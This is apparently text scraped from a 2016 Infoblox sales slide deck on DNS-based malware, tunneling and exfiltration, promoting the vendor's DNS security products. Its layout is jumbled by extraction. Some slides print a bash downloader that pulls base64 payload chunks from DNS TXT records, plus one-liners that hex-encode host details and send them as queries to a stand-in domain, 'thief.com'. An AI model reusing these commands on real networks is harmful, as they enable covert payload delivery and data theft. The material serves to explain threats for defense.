Infoblox Cibersecurity Strategy and HighWay 53

New Security Challenge: The DNS Highway and Network
Context on a Hybrid Architecture

1
1 || ©©2016
2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Joaquín
Rights Reserved. Gómez – Territory Sales Manager – IBERIA
Today’s Security Landscape
400+
VENDORS
4
4 || ©©2016
2013 Infoblox
Rights Rights Reserved.
The Security is Disconnected
Security You Want Security You Often Get
5
5 || ©©2016
2013 Infoblox
Incident Response Challenges
• Which user or device owns IP address X?

• What are the previous IP addresses that
device owned?
• Where is the device currently located?
• What internal resources have they been
accessing?
• Has this device recently exhibited signs of
compromise – Malware C2 or Data
Exfiltration
6
6 || ©©2016
2013 Infoblox
Operational
Challenges
7
7 || ©©2016
2013 Infoblox
Network and Security – Separate Teams with
Different Priorities
NETWORK TEAM SECURITY TEAM The Problems this Causes:
• Wastes resources for security and
High Availability Risk Mitigation audit/compliance

• Makes IHR process more difficult
Network Security • Extends time to remediation of incidents
Infrastructure: Infrastructure:
routers, APs, firewalls, endpoints,
switches, etc sandboxing, etc
Network Logging and Security Logging and

Monitoring Monitoring (SIEM)
9
9 || ©©2016
2013 Infoblox
Gartner’s View on Silos
Silos between network, edge, endpoint and data
security systems and processes can restrict an
organization’s ability to prevent, detect and respond
toBest Practices for Detecting and Mitigating

advanced attacks.
Advanced Threats, 2016 Update 29 March 2016
10 | |©©2016
10 2013 Infoblox
DNS:
The Malware Control Plane
11 | | ©©2016
11 2013 Infoblox
DNS - Leading Culprit for Data Exfiltration
One Byte is Too Much
$3.8M 46%
Average consolidated cost % of survey respondents
45%
% of survey respondents
of a data breach1 that experienced DNS data that experienced DNS
exfiltration2 tunneling2
• DNS tunnels are commonly used to send sensitive information out

• Data can also be exfiltrated by embedding it directly in DNS queries
Source: SC Magazine, Dec 2014, “DNS attacks putting organizations at risk, survey finds”
1. Source: Ponemon Institute, 2015 Cost of Data Breach Study 2. Source: SC Magazine, Dec 2014, “DNS attacks putting organizations at risk, survey finds”
12 | |©©2016
12 2013 Infoblox
APT/Malware Proliferation Rooted in DNS
Easy to Let in, Touch to Get Out
91% 431M
Of malware uses DNS to New unique pieces of
#1
Malware C&C is #1
carry out campaigns1 malware in 20152 responsible vector for
crimeware3
• Intruders rely on DNS to infect devices, propagate malware and exfiltrate data
• Malware is designed to spread, morph and hide within your IT infrastructure
• Longer it takes to discover, the higher the cost of damage
1. Source: Cisco 2016 Annual Security Report 2. Symantec 2016 Internet Security Threat Report 3. Verizon 2016 Data Breach Investigations Report
13 | |©©2016
13 2013 Infoblox
DNS is a top attack vector
DNS is vulnerable to attacks, and exploitations
Exfiltration
Other
DoS Attacks 8%
FTP
HTTP Other 7% DNS
9% 4% 45%
NTP
11% HTTP
40%
*Cloudmark 2014 report
DNS
76%
14 | |©©2016
14 2013 Infoblox
Malware Exploiting DNS
• Over 91% percent malware uses DNS
̶To gain command and control
̶To exfiltrate data
̶To redirect traffic
• Despite adversaries’ reliance on DNS, 68%
organizations do not monitor recursive DNS
• Advanced attacks and data breaches persist and
impact all sizes and types of organizations
• Average total cost of data breach ~$3.8M USD
• The question isn’t if, but when you will be
attacked, and how effectively you can respond
Source: Cisco 2016 Annual Security Report
16 | |©©2016
16 2013 Infoblox
Exfiltrating Data via DNS Tunneling
• Uses DNS as a covert communication
channel to bypass firewalls Internet
• Attacker tunnels other protocols like SSH, or

web within DNS INTERNET
• Enables attackers to easily insert malware,

pass stolen data or tunnel IP traffic without ENTERPRISE
IP
detection traffic
• A DNS tunnel can be used as a full remote-

control channel for a compromised internal DNS
terminal server
host Encoded IP
in DNS
Iodine
Examples: queries
̶Iodine Client-side
tunnel program
̶OzymanDNS
̶SplitBrain
̶DNS2TCP
Slow DNS
17 | |©©2016
17 2013 Infoblox
Data Exfiltration over DNS
Syslog +12f(2354ayqv1asdf7s6ex.thief.com
Xc786asdf89xcbv897sadfjlw.thief.com
fityhkjDR65eUGYbjkUY6756.thief.com
nkjFYVW$%&(YBH$JKGHkjh.thief.com
Rogue DNS Server
om
f.c
hie
Data is listed on Darknet
x .t
6e
and sold for Bitcoin
f7s
sd
1a
qv
ay
54
23
2f(
+1
+12f(2354ayqv1asdf7s6ex
Xc786asdf89xcbv897sadfjlw
fityhkjDR65eUGYbjkUY6756
nkjFYVW$%&(YBH$JKGHkjh
Compromised
Endpoint
18 | |©©2016
18 2013 Infoblox
Malware Infiltration over DNS
"f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAA
AAABAAAAAAAAAAOCQAgAAAAAAAAAAAEAAOAAIA
EAAJQAiAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAA
AEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAA
AAAAAAAAwAAAAQAAAAAAgAAAAAAAAACQAAAAA
AAAAJAAAAA" Command
Quer
y
and
Rogue DNS for TX
Server T Control
Binary code is encoded and loaded
update
DDNS
into TXT records
"f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAAAA
Query ABAAAAAAAAAAOCQAgAAAAAAAAAAAEAAOAAIAEAAJ
for TXT QAiAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAAAEAAQA
AAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAAw
AAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAA"
19 | |©©2016
19 2013 Infoblox
DNS Infiltration = Malware code acquisition
Downloader Script 4 TXT records
#!/bin/bash 23212f62696e2f62617368206572726f723d5c273b
error=';; connection timed out; no servers could be 3b20636f6e6e656374696f6e2074696d6564206f75
reached' 743b206e6f207365727665727320636f756c64206
i=0 26520726561636865645c2720693d30206563686f
echo ''> output.b64 205c275c273e206f75747075742e6236
while :
do 34207768696c65203a20646f202020524553503d6
RESP=`dig +short $i.$1 TXT | cut -d'"' -f 2` 0646967202b73686f72742024692e243120545854
if [ "$RESP" = "$error" ]; 207c20637574202d645c275c225c27202d662032
then 602020206966205b205c2224524553505c22203d
echo "Timeout - done" 205c22246572726f725c22205d3b202020
break
fi 7468656e20202020206563686f205c2254696d656
echo -ne $RESP >> output.b64 f7574202d20646f6e655c22202020202062726561
echo $RESP 6b20202066692020206563686f202d6e652024524
i=$((i+1)) 55350203e3e206f75747075742e62363420202065
63686f202452455350202020693d2428
done
cat output.b64 | base64 -d > output
28692b31292920646f6e6520636174206f7574707
5742e623634207c20626173653634202d64203e2
06f7574707574
20 | |©©2016
20 2013 Infoblox
DNS Exfiltration = Command and Control
Signaling and Control responses with DNS
hostname | xxd -p
Query A -> 6a75747465722d6d62702e6c6f63616c0a.thief.com
PTR -> 1.2.3.4
ipconfig getifaddr en0| xxd -p

IPv4 Query A-> 3137322e32302e31302e320a.thief.com
Hostname PTR -> 1.2.3.4
Gateway
route -n get default|grep gateway|cut -d: -f 2|sed 's/^[ \t]*//;s/[ \t]*$//'|xxd -

p Query A-> 3137322e32302e31302e310a.thief.com
PTR -> 1.2.3.4
21 | |©©2016
21 2013 Infoblox
Security in Layers, What About DNS or GDPR?
DNS is Coverage? YES with Infoblox
App Offerings
Salesforce.com
Office 365
Workday – HR
SAP
Firewall/NGFW
Your SIEM Solution
• Centralized logging and reporting
IPS/IDS
DNS communicates via Port Web Proxy

53 and is NOT protected by
these tools
Email/SPAM
 Secure DNS at the source
APT/  Reporting
Sandbox  Proactive block malware and
DNS understand who’s infected
Biz  Prevent IP leaving your DC
IP/Dat DHCP
a
22 | |©©2016
22 2013 Infoblox
Motion of Malware through Networks: “PIE”
APT/malware uses DNS at every stage
P Penetration
Query malicious domains
and report to C&C I Infection
Download malware to
the infected host E Exfiltration
Transport the data
offsite
DNS
server
23 | |©©2016
23 2013 Infoblox
Breaking the Security GAP:
Control Plane for context

visibility and prevent data
exfiltration
24 | |©©2016
24 2013 Infoblox
Infoblox Advanced DNS Protection - ADP
WHERE IT FITS
The solution components of Advanced DNS
Protection include:
• Software ADP:
For organizations with lower capacity
requirements with a lower entry price point.
• Infoblox Appliances:
Trinzic hardware and virtual appliances consist
of Trinzic TE-1410/1420/ 815/825/1415
appliances with software ADP subscription add-
on. Virtual appliances are supported on VMware
and KVM.
• Advanced DNS Protection Service:
The software plus Threat Adapt technology
provides ongoing protection against existing and
evolving threats to the DNS server.
• Reporting and Analytics:
Deep visibility and rich network context around
attack patterns and sources.
25 | |©©2016
25 2013 Infoblox
ActiveTrust Service®
Infoblox Threat
Infoblox Threat Intelligence
Infoblox DNS
Insight in the Data Exchange Infoblox Dossier
Firewall
Cloud / On-Prem (TIDE)
27 | |©©2016
27 2013 Infoblox
Active Trust - Threat Intelligence (Actionable!)
• “Feeds” only block access
Phishing
̶ Cause of the problem is still there!
Botnets
SPAM ̶ Still require analysts to identify
IPs ActiveTrust TIDE
Size, Scope, Severity
̶ Still require them to find and clean
URLs
the device
• Local intelligence (context) allows you
to start automating the analysis and
Infoblox Threat
Intelligence mitigation
Feed NAC
- Base
Malwar
e
̶ It now becomes ”Actionable
DLP
- Malware
WAF Intelligence”
- Ransomware
IPS
NGFW • Finally, there are many feeds
• Device IP address
FEEDs
Feed(s) • Device MAC address
FW ̶ Each specializes in something
• Device type
• Device host name
̶ There is very little overlap
Infoblox DDI
Platform • Device lease history ̶ As customers’ security capability
• User Logged
User-defined • Device localization matures, they use more and more
Other Vendor • Device Metadata
Feed
RPZ behaviors
28 | |©©2016
28 2013 Infoblox
Infoblox TIDE – External Threat Feeds
Solution Overview
Infoblox supplements ActiveTrust
threat data with threat data from
third-party sources by allowing that
data to be managed from within
Infoblox TIDE.
Benefits
1. Eliminate cost of onboarding
Infoblox additional third-party data
TIDE 2. Maximize resources by giving
back time to the security operations
and threat intelligence team
29 | |©©2016
29 2013 Infoblox
Infoblox TIDE/Dossier IOC loockups
ActiveTrust® - Threat Intelligence Providers
Solution overview:
Infoblox TIDE solution allows customers to
send TIDE and Dossier lookup requests,
enabling customers to break silos of
security tools and facilitating effective
protection for both the network and
XML JSON STIX CSV
endpoint domains.
Benefits:
1. Visibility across both network and
IOC lookups
endpoint domains.
2. Remediation and policy actions enabling
faster response to threats
SIEM / Security Devices

30 | |©©2016
30 2013 Infoblox
Leveraging Threat Intel Across Entire Security Infrastructure
Infoblox C&C IP List
Phishing &
SURBL Malware URLs Various
TIDE file
Marketplace Define Data Spambot IPs formats
Policy,
Governance & C&C & Malware
Custom TI Translation Host/Domain
• Threat intel automatically

aggregated from internal
Dossier
and external sources Investigate
• Flexible data distribution Threats
to NGFW, SIEM, etc.
RESULT: Single-source of TI management Faster triage Threat Prioritization
31 | |©©2016
31 2013 Infoblox
How The Streaming DNS Threat Insight Works
Detects sophisticated data exfiltration techniques
that don’t have well-known signatures (zero day)
1.Looks at TXT records, A, AAAA records
2.Detects presence of data using lexical and Entropy
temporal analysis
3.Certain attributes add to a threat score,
others subtract from it Size Lexical
Analysis
4.Final score classifies a request as exfiltration
or not Model
5.If exfiltration is found, automatically adds
destinations to special internal RPZ feed Frequency N-Gram
6.Scales protection to other parts of the

network
32 | |©©2016
32 2013 Infoblox
ActiveTrust Cloud
Challenge
• Customers need access to actionable

Threat Intel IOC’s for Analytics, and
security ecosystem solutions.
Solution
• ActiveTrust TIDE allows customers to

utilize Infoblox Threat Intel in all their
security ecosystem solutions.
Benefits
• Improved Security, Valuable Threat Intel

• Better ROI on all their existing solutions
• Faster Identification & better threat prevention
34 | |©©2016
34 2013 Infoblox
Easing Operational
Challenges
36 | |©©2016
36 2013 Infoblox
What Infoblox can provide…
Supporting the ecosystem…
Orchestration plug-ins and integration

e.g. SCO, vRA, ServiceNow, BMC,
AWS, Azure, Openstack
Security integrations DNS DHCP

e.g. Cisco ISE, Carbon Black,
FireEye, Rapid7, STIX/TAXII
IPAM
APIs for integration and automation
e.g. RESTful API
Reporting to monitor, manage & alert
37 | |©©2016
37 2013 Infoblox
The DDI Data Gold Mine
DHCP IPAM DNS
Device Audit Trail Application and Activity Audit Trail
and Fingerprinting Business Context
A DHCP assignment signals Fixed IP addresses are typically DNS query data provides a
the insertion of a device on to assigned to high value devices: “client-centric” record of
the network activity
• Data center servers, network
• Includes context: Device info, devices, etc. • Includes internal activity
MAC, lease history inside the security perimeter
• IPAM provides “metadata” via
• DHCP is an audit trail of Extended Attributes: Owner, • Includes BYOD and IoT
devices on the network app, security level, location, devices
ticket number
• This provides an excellent
• Context for accurate risk basis to profile device & user
assessment and event activity
prioritization
38 | |©©2016
38 2013 Infoblox
Infoblox NGDDI, Most Accurate Information
Authoritative Network Database
What IP? DHCP Service / Discovery
ONE SHOT
What has
When Appear? Allocate / Discovery / Cloud happened in the
past?
Which MAC ? DHCP or Discovery
IP, User, hostname,
Device Type? DHCP Fingerprint RPZ, lease…
DNS hostname? DNS + DDNS updates Ecosystem Activity?
User Behind? AD user Identity Mapping
Tracking History?
Where is It? Network Insight / Cloud IPAM
Network Context? Risk, localization, attributes

ONE SHOT Infoblox Reporting
Infected? Block? DNSFW / Insight + Ecosystem and Analytics
40 | |©©2016
40 2013 Infoblox
Infoblox as part of Cybersecurity Orchestration
Accelerating Incident Handling and Response with Automation
Context to Prioritize
Remediation
Device Audit Trail and
Fingerprinting
DHCP • Device info, MAC, lease history
Application and
Business Context
IPAM • “Metadata” via Extended Attributes:
Owner, app, security level, location,
ticket number
• Context for accurate risk

assessment and event prioritization
• Malicious activity inside the security

perimeter
DNS
• Includes BYOD and IoT devices
• Profile device & user activity
41 | |©©2016
41 2013 Infoblox
How can Infoblox
Help You Get
There
Infoblox
Actionable
Network
Intelligence
Delivers Control and
Security from the Core
42 | |©©2016
42 2013 Infoblox
Iberia SALES: Pre-SALES:
Joaquín Gómez Jose Canelada
jgomez@infoblox.com jcanelada@infoblox.com
+34 670 499 348 +34 678 534 519
Q&A
Muchas Gracias
¿Preguntas?
43 | |©©2016
43 2013 Infoblox

Infoblox Cibersecurity Strategy and HighWay 53

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Infoblox Cibersecurity Strategy and HighWay 53

Uploaded by

Copyright:

Available Formats

New Security Challenge: The DNS Highway and Network

Context on a Hybrid Architecture

Security You Want Security You Often Get

• Which user or device owns IP address X?

High Availability Risk Mitigation audit/compliance

Network Logging and Security Logging and

security systems and processes can restrict an

organization’s ability to prevent, detect and respond

toBest Practices for Detecting and Mitigating

• DNS tunnels are commonly used to send sensitive information out

Source: Cisco 2016 Annual Security Report

• Attacker tunnels other protocols like SSH, or

• Enables attackers to easily insert malware,

• A DNS tunnel can be used as a full remote-

Binary code is encoded and loaded

PTR -> 1.2.3.4

ipconfig getifaddr en0| xxd -p

route -n get default|grep gateway|cut -d: -f 2|sed 's/^[ \t]*//;s/[ \t]*$//'|xxd -

PTR -> 1.2.3.4

DNS communicates via Port Web Proxy

Control Plane for context

SIEM / Security Devices

Infoblox C&C IP List

• Threat intel automatically

RESULT: Single-source of TI management Faster triage Threat Prioritization

6.Scales protection to other parts of the

• Customers need access to actionable

• ActiveTrust TIDE allows customers to

• Improved Security, Valuable Threat Intel

Orchestration plug-ins and integration

Security integrations DNS DHCP

Reporting to monitor, manage & alert

Network Context? Risk, localization, attributes

• Context for accurate risk

• Malicious activity inside the security

• Profile device & user activity

You might also like

route -n get default|grep gateway|cut -d: -f 2|sed 's/^[ \t]//;s/[ \t]$//'|xxd -